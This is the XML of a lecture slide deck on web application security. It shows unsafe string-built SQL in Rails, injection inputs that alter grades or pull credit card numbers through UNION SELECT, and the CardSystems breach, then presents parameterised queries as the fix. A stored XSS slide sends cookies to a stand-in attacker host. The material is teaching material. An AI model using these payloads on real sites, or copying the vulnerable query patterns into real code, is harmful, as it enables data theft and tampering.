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9" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="258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8"/>
    <a:srgbClr val="6A94E0"/>
    <a:srgbClr val="B7CBF0"/>
    <a:srgbClr val="D5E0F7"/>
    <a:srgbClr val="5252BA"/>
    <a:srgbClr val="D81C1C"/>
    <a:srgbClr val="F2F6FC"/>
    <a:srgbClr val="EAEAEA"/>
    <a:srgbClr val="F8F8F8"/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6E52C6-BC49-4E06-8AAB-1AE1023D96B3}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>7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2" rIns="91421" bIns="45712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83110D5-8940-48F8-A83D-A5029E6C951E}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>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21" tIns="45712" rIns="91421" bIns="4571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4A480691-AD52-40D9-85DF-C056B1E23545}" type="slidenum">
              <a:rPr lang="en-US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Unsafe Server Code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762000" y="1295400"/>
            <a:ext cx="74993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advisorName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[:form][:advisor]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students = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Student.find_by_sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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"SELECT students.*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"FROM students, advisors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"WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>student.advisor_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = advisor.id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"AND advisor.name = '" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>advisorName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + "'");</a:t>
            </a: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762000" y="4403725"/>
            <a:ext cx="64325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SELECT students.* FROM students, advisors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student.advisor_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = advisor.id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AND advisor.name = '</a:t>
            </a:r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Jones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3079" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736600" y="3810000"/>
            <a:ext cx="208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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Typical query: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80866" y="5715000"/>
            <a:ext cx="229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Value from form field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4881966" y="5331417"/>
            <a:ext cx="891153" cy="565688"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 891153 w 891153"/>
              <a:gd name="connsiteY0" fmla="*/ 565688 h 565688"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 891153"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 565688"/>
              <a:gd name="connsiteX0" fmla="*/ 891153 w 891153"/>
              <a:gd name="connsiteY0" fmla="*/ 565688 h 565688"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 891153"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 565688"/>
              <a:gd name="connsiteX0" fmla="*/ 891153 w 891153"/>
              <a:gd name="connsiteY0" fmla="*/ 565688 h 565688"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 891153"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 56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1153" h="565688">
                <a:moveTo>
                  <a:pt x="891153" y="565688"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="59410" y="547606"/>
                  <a:pt x="25831" y="459783"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBez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69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1D076E5D-E36F-4191-8F79-5A1889623C58}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/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Injection Attack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762000" y="1447800"/>
            <a:ext cx="46037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Jones';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UPDATE grades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SET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>g.grade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 4.0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FROM grades g, students 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g.student_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = s.id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AND s.name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Smith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762000" y="3886200"/>
            <a:ext cx="64325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SELECT students.* FROM students, advisors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student.advisor_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = advisor.id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AND advisor.name = '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Jones';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UPDATE grades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SET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g.grade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= 4.0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FROM grades g, students s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WHERE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g.student_id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= s.id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AND s.name = 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'Smith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'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4103" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736600" y="3429000"/>
            <a:ext cx="2389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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Resulting query:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4104" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736600" y="990600"/>
            <a:ext cx="6418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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enter the following in the "Advisor name" field:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3929780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432A0BA-6389-456B-93DA-2E452B6B697E}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>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Stealing Private Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5125" name="Picture 4" descr="sqlInject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4876800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49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660442B3-7B5C-402A-B493-10894774EFDA}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/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Stealing Private Info, cont'd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762000" y="1508125"/>
            <a:ext cx="73469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month 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[:form][:month]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orders = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Orders.find_by_sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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"SELECT pizza, toppings, quantity, date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"FROM orders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    "WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +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    "AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>order_month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= '" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>month + "'");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762000" y="4403725"/>
            <a:ext cx="76517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October' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AND 1=0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UNION SELECT name as pizza, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>card_num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as toppings,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exp_mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as quantity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exp_year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as date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FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>credit_cards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> WHERE name != '</a:t>
            </a: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6151" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736600" y="3810000"/>
            <a:ext cx="2668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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What if "month" is:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6152" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736600" y="990600"/>
            <a:ext cx="2760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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server query code:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141868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C8735C94-0AF5-4F45-AEA4-B3508D7C4221}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>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Resulting Query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762000" y="1143000"/>
            <a:ext cx="772519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SELECT pizza, toppings, quantity, date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FROM orders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user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=94412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AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>order_month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>='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October'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AND 1=0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UNION SELECT name as pizza,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card_num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toppings,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exp_mon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quantity,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exp_year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date</a:t>
            </a:r>
            <a:b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</a:b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   FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>credit_cards</a:t>
            </a:r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 WHERE name != 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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/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890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9728D924-F23B-41B1-80E0-BE7925247B28}" type="slidenum">
              <a:rPr lang="en-US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Resulting Query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762000" y="1143000"/>
            <a:ext cx="772519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SELECT pizza, toppings, quantity, date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FROM orders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WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=94412</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>order_month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>='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October'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AND 1=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/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UNION SELECT name as pizza,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card_num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 as toppings,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/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   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exp_mon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 as quantity,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exp_year</a:t>
            </a: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 as date</a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>credit_cards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WHERE name != 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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49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505200"/>
            <a:ext cx="6615800" cy="316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44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CardSystems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Credit card payment processing company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SQL injection attack in June 2005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The Attack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Credit card #s stored unencrypted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263,000 credit card #s stolen from database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43 million credit card #s exposed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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="921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4D428D7-8CD3-473C-AE81-BC2BDABC9467}" type="slidenum">
              <a:rPr lang="en-US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b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CardSystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Attack</a:t>
            </a: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59DF168-6DA3-4581-8209-F7205E3ACD49}" type="slidenum">
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92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36550"/>
            <a:ext cx="1397000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50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DB698A2-474C-4409-BCA0-C8817AD36F96}" type="slidenum">
              <a:rPr lang="en-US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Let Rails Handle SQL Escaping</a:t>
            </a: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762000" y="1584325"/>
            <a:ext cx="7263527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latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Student.find_by_sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("SELECT students.* " +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    "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FROM students, advisors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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>student.advisor_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = advisor.id 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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AND advisor.name = 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?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>",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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[:form][:advisor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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63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0DB698A2-474C-4409-BCA0-C8817AD36F96}" type="slidenum">
              <a:rPr lang="en-US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Prepared Statements</a:t>
            </a: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762000" y="1584325"/>
            <a:ext cx="74993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$statement = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>odbc_prepare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($connection,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"SELECT * FROM students " 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   "WHERE advisor = ? AND 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 &gt;= ?;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>odbc_execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($statement, array($advisor, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10246" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="3870325"/>
            <a:ext cx="62801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</a:rPr>
              <a:t>statement = connection.prepareStatement(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    "SELECT * FROM students " +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    "WHERE advisor = ? AND gpa &gt;= ?;");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statement.setString(1, advisor);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statement.setString(2, gpa);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ResultSet rs = statement.executeQuery();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10247" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="3429000"/>
            <a:ext cx="912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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10248" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="1143000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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="931523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BC15B2E4-1FA9-416B-A769-D72FD60CB138}" type="slidenum">
              <a:rPr lang="en-US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Stored XSS Attack</a:t>
            </a:r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457200" y="1385888"/>
            <a:ext cx="5416868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&lt;div class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blogComment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;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smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>comment.message.html_safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%&gt;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</a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>div&gt;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457200" y="4175125"/>
            <a:ext cx="8032968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I agree completely with Alice ...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style="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display:none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" id="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cookieMonster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"&gt;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script&gt;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document.getElementById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cookieMonster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");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img.src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= "http://attacker.com?cookie="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encodeURIComponent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document.cookie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script&gt;</a:t>
            </a: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3928818" y="2819400"/>
            <a:ext cx="16337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chemeClr val="folHlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No escaping!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:solidFill>
            </a:endParaRPr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 flipV="1">
            <a:off x="4740943" y="2450068"/>
            <a:ext cx="0" cy="445532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TextBox 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3733800"/>
            <a:ext cx="320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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacking blog entry:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11274" name="TextBox 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
